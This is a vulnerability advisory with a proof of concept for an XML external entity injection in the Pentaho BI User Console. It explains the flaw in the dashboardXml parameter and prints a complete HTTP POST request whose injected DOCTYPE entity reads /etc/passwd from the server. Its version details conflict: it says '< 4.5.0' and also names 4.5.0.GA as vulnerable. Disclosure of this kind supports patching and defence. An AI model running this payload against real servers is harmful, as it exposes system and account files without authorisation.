Pentaho < 4.5.0 - User Console XML Injection

========================================================================
                   title: Pentaho User Console XML Injection Vulnerability
                 program: Pentaho BI User Console
      vulnerable version: Pentaho < 4.5.0
                homepage: http://www.pentaho.com/
               Tested on: Linux x86/x86_64
                   found: Feb. 5 2014
   Original Discovery by: Taylor Tippins
              Exploit By: K.d Long [email protected]
========================================================================

Vendor description:
-------------------

The Pentaho Business Analytics suite manages Business Intelligence solutions, generate the reports, 
data aggregation, and provides users access to analysis views.

Vulnerability description:
--------------------------
   The dashboardXml parameter is vulnerable to XML external entity injection. The tag <!DOCTYPE foo 
[<!ENTITY xxe8295c SYSTEM "file:///etc/passwd"> ]> was injected into the XML of the client's POST 
request. This tag defines an external entity, xxe8295c, which references a file on the XML parser's 
filesystem. This entity was then used within a data field in the XML document. The server's response 
contains the contents of the specified file, indicating that the parser processed the injected 
external entity.

By manipulating the POST request to “/pentaho/content/dashboards” it is possible to inject arbitrary 
XML declarations- and tags. This request is triggered while a user is creating a customized dashboard.

Proof of concept:
-----------------
The following entity declaration would create a new XML entity with the content of the /etc/passwd 
file which can be referenced in the following XML request content:

---cut here---
POST /pentaho/content/dashboards HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: https://example.com/pentaho/content/dashboards?command=new
Cookie: loginNewWindowChecked=false; JSESSIONID=61448378278C147D05BC95BAB4B63F19
Content-Length: 2458
Connection: keep-alive


command=templatecontents&dashboardXml=<!DOCTYPE foo [<!ENTITY xxe8295c SYSTEM "file:///etc/passwd"> 
]><dashboard>
<title>New Dashboard</title>
<heading>New Dashboard</heading>
<enableWidgetPrinting>false</enableWidgetPrinting>
<documentation>
<author>test</author>
<description></description>
<icon></icon>
</documentation>
<template-ref>xul/04-1-then-2.xul&xxe8295c;</template-ref>
<theme-ref>00-Onyx</theme-ref>
<layout>
<overlay  xmlns:pho="http://www.pentaho.com">
<box id="Panel_1" pho:title="Untitled 1" type="titled-panel"  flex="1"  collapsed="false" />
<box id="Panel_2" pho:title="Untitled 2" type="titled-panel"  flex="1"  collapsed="false" />
<box id="Panel_3" pho:title="Untitled 3" type="titled-panel"  flex="1"  collapsed="false" />
<box id="Panel_4" pho:title="Untitled 4" type="titled-panel"  flex="1"  collapsed="false" />
<box id="Panel_5" pho:title="Untitled 5"/>
<box id="Panel_6" pho:title="Untitled 6"/>
<box id="Panel_7" pho:title="Untitled 7"/>
<box id="Panel_8" pho:title="Untitled 8"/>
<box id="Panel_9" pho:title="Untitled 9"/>
<box id="Panel_10" pho:title="Untitled 10"/>
<box id="titlebar" title="" height="23"  hidden="false"  width="0"  type="pagetitle" 
collapsed="false" /><box id="widget-area" type="scrollarea"/><box id="widget-area" flex="1"/><box 
id="FilterPanel" title="" height="100"  hidden="true"  width="0"  type="povpanel"  collapsed="false" 
/><box id="hbox1" type="layout"/><box id="hbox1" flex="1"/><box id="hbox2" type="layout"/><box 
id="hbox2" flex="1"/></overlay>
</layout>
<parameters>
</parameters>
<widgetJavascript><![CDATA[[]]]></widgetJavascript>
</dashboard>
&type=html
---cut here---


Vulnerable versions:
--------------------
Pentaho User Console Release 4.5.0.GA.49857


Vendor contact timeline:
------------------------
02/16/2014: Vendor notified via email